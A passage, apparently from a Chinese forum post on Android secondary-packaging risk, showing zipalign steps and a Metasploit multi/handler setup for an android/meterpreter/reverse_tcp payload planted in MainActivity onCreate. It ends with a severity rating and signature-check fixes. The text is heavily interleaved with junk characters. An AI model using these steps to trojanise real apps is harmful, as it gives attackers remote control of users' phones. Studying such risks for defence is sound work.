. X# n) f6 [* b, a0 V$ g( ^0 O& y' }- H, u2 z+ { keytool -printcert -jarfile repackaged.apk $ L& r1 ?1 H, L( V1 ^ & K! b- c- y2 e" b* _

- D ?5 A3 K% g/ N# n; b& K ; c) {' C, N( ` D5 P 对齐 % [# X1 z+ i' z3 { ) {) e, B: P' q' `) [* A

9 T1 p4 b1 o4 u/ g: `! K $ }+ Q( O9 K9 P7 \! I" g 字节对齐优化 8 O: K+ A# o3 v 5 ~1 [& O( H* J2 l6 \' a/ |

; ~3 E" q3 U2 x* w; {( h0 Z5 Z# u2 C) J% V7 B$ S' r: [ zipalign -v 4 repackaged.apk final.apk 2 Q# ^& Q" [& E& H: D ' N1 u6 Q# I7 n( F" s U; t

$ r4 r( h$ r' F& @/ s9 K# {1 Q2 V4 k 检查是否对齐 6 a7 z; v K+ K" Y9 c. z1 r ) f% |" ]3 m2 D" ^6 C4 S d

/ y0 O" u2 b+ O6 p& ?& t- J# M: G; ~0 I1 _) @: e1 I% Y0 Q zipalign -c -v 4 final.apk & ?1 L* W, j; q) G& @ } ( K# R% x5 W0 I) f/ [/ K/ S& Y* W

1 |- ^- Y- f/ ]; `" _* ] 1 s' \: U0 { m 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( k& ]. V0 \8 C/ ~# I5 `: h * G( Y4 a$ m' S

5 m0 B" D$ ?4 m( Q3 E3 C 9 f& U3 s) k2 ^* }6 ]9 k* A9 l' H% u$ B! b 启动Metasploit控制台，配置参数等待上线 5 S) \; H) d/ M0 ]* y! l9 h 4 w" e" x) g1 ~5 E1 S

+ o" r8 z5 s$ a+ j 6 y+ F/ k* R& a 在终端依次输入如下命令 / [- y) R& m! ^, Q; h% W $ S+ z1 F9 k+ D1 q1 p. B

# g' g8 M' O" v$ \9 V; U$ i7 s# C. B , `" |. F$ `" c; w! N, l msfconsole 2 z7 B, `8 D) x) Y9 ~9 U ) Z: Q, q' O4 u; O7 c2 t

' Z% T: f: k$ k$ N a% M " B. h* q8 Z% h- |+ p use exploit/multi/handler $ b) C$ x$ Z9 M9 Q( x% d. O3 [2 r' Y$ ^: u

2 i* y4 p$ q6 {& A- a, K" |; a% s7 p set PAYLOAD android/meterpreter/reverse_tcp : [- [, a7 j( W 3 ~( q8 b2 _1 q( e. }% d: X

- n4 T7 q! X5 ~/ Q& {6 z7 z , F P1 M: g; l# L3 a' N set LHOST 192.xxx.xx.xx ; u; u& H0 p' m }6 {7 o% w# i " [5 C# {3 j; G( f. x8 O( N

; v$ o/ V5 a9 W7 k! f ' w7 ~8 _# o6 [( r set LPORT 4444 s& L$ D4 L) P5 e: R( q- @ 1 I4 d- d. o2 {

: v7 O# b+ Z: d$ H. N1 U$ a! _- w( r+ ^. l+ [8 ~7 i! v$ D6 i# ? exploit 3 l4 h& W! h: g% X: F" Q5 u4 w" b/ }: J$ z; B/ I/ q

4 ^8 O# C# ] M$ F' ?# K% T5 p : ^9 J0 i' @7 a1 P. i 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 7 [: l/ i C$ x5 ]+ z 2 W# r7 N. T4 V8 e

7 \( s9 d; }5 t8 Z ! N% Q/ }: k: o8 D 漏洞危害：中 4 X, ?8 \, g- ~6 i; d4 u3 }( c7 v' o5 u# T

: @5 w9 c$ _/ [. ^( P * D) v \! Y! Q- {) i, {; n& Z* u 0 i# g% g& v2 h2 T7 q2 U" r 0 o; C9 y( J2 C: k" Y$ ] 严重程度 8 ?. P2 C; D) f- V3 Q: J0 f % G/ @$ o! R) ~# i* Q7 i" k : u0 q9 d; B4 K/ k0 e : C/ O" V/ j* B: \	% f" h0 j( L7 n) k; a 4 T% A% N& j# D7 l. Y" @ ` ; R3 e8 Y6 B) u, j+ {2 A ' f/ ~1 g) }3 E2 p( \|! P# Y1 C8 o0 v' i 高 2 ]6 h1 [0 ~* b% Z( m, S & J- V4 h. k. A3 r% O- F - q: i N9 k0 e# A& q, O g% T: R; f1 {8 u8 g1 c	( Z' W+ j. [7 t8 c4 p6 B 4 {; \ [( w s B' A# [ ' p7 s& q2 U- o: Z1 x6 E- ]! w& Q; U+ ] ■ 5 s- _( e2 e5 y5 o" k; d { ' V$ h% K) n; B ! [ g. \|( {; }# K( d/ }2 N# D2 q! ^* {7 T/ a, }) h	2 N( ^8 y# x2 O# Z+ l8 n1 C* O, ^ : ^' w+ A' E; x% o% l ! B) @# u% D& W; T- G. K: M+ ~ 0 p! s/ W9 e- I7 Z 中 7 y" A. G9 u0 Z; x$ C 4 @. M. w" B2 z! g) E8 [- J! ~+ } # W) z# w0 g& t+ ?4 c' m ) {1 L2 f: \+ i% R V3 q3 r	$ ^+ m' s, a+ U! L4 `5 y 8 s! A7 v8 o B1 { 3 ^& r/ @% n6 B$ O" C ) S# h! x3 w A% P; q 5 [3 E- E8 x2 @( ? 9 v8 n& u. b/ K$ ^( \|. i % `: p* W; `- Y$ Y : g' @, S/ O- }# h1 L, Q ) ]6 T9 u2 [$ H! h7 V! G6 A" c2 z# S+ i4 j9 j" g	% L" ~) N4 d, g5 G ! s% z9 n1 l0 _* M* i 8 y+ J3 c) M1 f, x( i 2 q8 i( c7 C) \|* F: \ 低 ; p' B1 b% Q6 q - [( @3 c8 \8 U/ z# m $ F. v U6 e0 [* t0 ~: ~* f8 {5 l {; G, H, j9 Q7 I) H	) ]( j3 _/ I7 \; w5 S8 r2 t + C7 t9 S' {8 v9 ] 0 I+ d( i3 T/ ]: N/ \% n t9 U; K) v$ d+ t: b . h. [( X% w, [, m9 S& i/ W9 k 8 N, h! u1 l" P- Z 8 p. B+ @ p1 C M6 [ D d1 } _ 9 r: i% s0 W$ i# @1 { ) ]! m% x: ?! R ( Z g/ m d7 Q

3 H+ Y! Y) n7 s3 G % ^6 p4 x) |5 T( ~; r/ O & J# z( _1 q1 J2 d, m( o8 M$ k4 l 7 I9 A3 [6 e F

2 f) m* T. h# D& e: l5 D5 |9 Q " R0 p/ J$ T9 ?# q0 l 修复方法： 8 s% u& g |+ m# d2 _/ S4 {7 E1 @9 I" u6 E+ l

\) l# _; l6 U5 ?3 J1 [7 }" E ( d n* ]9 P6 [! S, K! b9 W' X 1.在 APP 启动时应做签名校验防止二次打包。
. @& t& k* R [3 ]* B j: i 2 f( c0 M7 S; B1 l: L. U8 e 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 + T5 u( _( n7 |0 F7 h g ! y. O. w' J+ m5 T

1 `5 E: x6 d6 {; P* p; E& M! e+ U. i! U/ Q j/ X- g$ X0 i* K' f8 N. T; `5 l, l% b+ ]

8 c$ }4 F& J7 _! S4 n7 n5 C) m/ ] * B* u% \% y' c% F& a5 g! a s+ t
7 d; N2 Z! y! a/ q) [' @4 _ ( j+ j8 P4 Q+ s9 ~ O" x% ~8 M

		自动登录	找回密码
密码			立即注册